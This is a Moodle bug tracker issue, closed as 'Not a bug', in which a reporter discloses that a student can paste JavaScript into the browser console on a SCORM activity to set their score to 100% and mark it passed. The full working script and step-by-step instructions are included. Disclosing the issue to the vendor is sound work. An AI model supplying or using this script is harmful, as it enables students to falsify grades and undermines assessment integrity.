Uploaded image for project: 'Moodle'
  1. Moodle
  2. MDL-61942

SCORM scores can be manipulated via javascripts

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Minor
    • Resolution: Not a bug
    • Affects Version/s: 3.3.3
    • Fix Version/s: None
    • Component/s: SCORM
    • Labels:
      None
    • Affected Branches:
      MOODLE_33_STABLE

      Description

      Hi, I posted a similar message in the General Help section (without the codes), but did not received a response. I'm not sure if this is the right place to post this.

      The issue is that an user can use javascript in the browser developer tool console to change the score they received in the SCORM module. I'm not sure if Moodle is aware of this issue or this is something beyond Moodle's control. Essentially, I'm saying with some knowledge of javascripts, a student can change their grades in SCORM report! I haven't tried it in other activities.

      I did not purposely try to look for a way to change SCORM scores via javascript. I was looking for a better way to track progress for SCORM objects (for e.g. created in Articulate Storyline) that doesn't rely on quiz results.

      These are the codes below. You have to login as a student for a course with a SCORM object. Then go to Chrome browser Developer's tool > consoles > choose the SCORM object > cut and paste the codes > You will score 100% in the report without having to complete the SCORM.

       

      function findLMSAPI(win) {
      // look in this window
      if (win.hasOwnProperty("GetStudentID")) return win;

      // all done if no parent
      else if (win.parent == win) return null;

      // climb up to parent window & look there
      else return findLMSAPI(win.parent);
      }

      function setStudentProgressViaScore(setScore) {
      var currentScore = lmsAPI.GetScore();
      if (currentScore < setScore)
      lmsAPI.SetScore(setScore,100,0);
      }

      var player = GetPlayer();
      var lmsAPI = findLMSAPI(this);

      setStudentProgressViaScore(100);

      lmsAPI.SetReachedEnd();
      lmsAPI.SetPassed();

       

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              intist.sro AC Cheng
              Participants:
              Component watchers:
              Damyon Wiese, Dan Marsden, Matteo Scaramuccia, Adrian Greeve, Jake Dallimore, Mathew May, Mihail Geshoski, Peter Dias
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: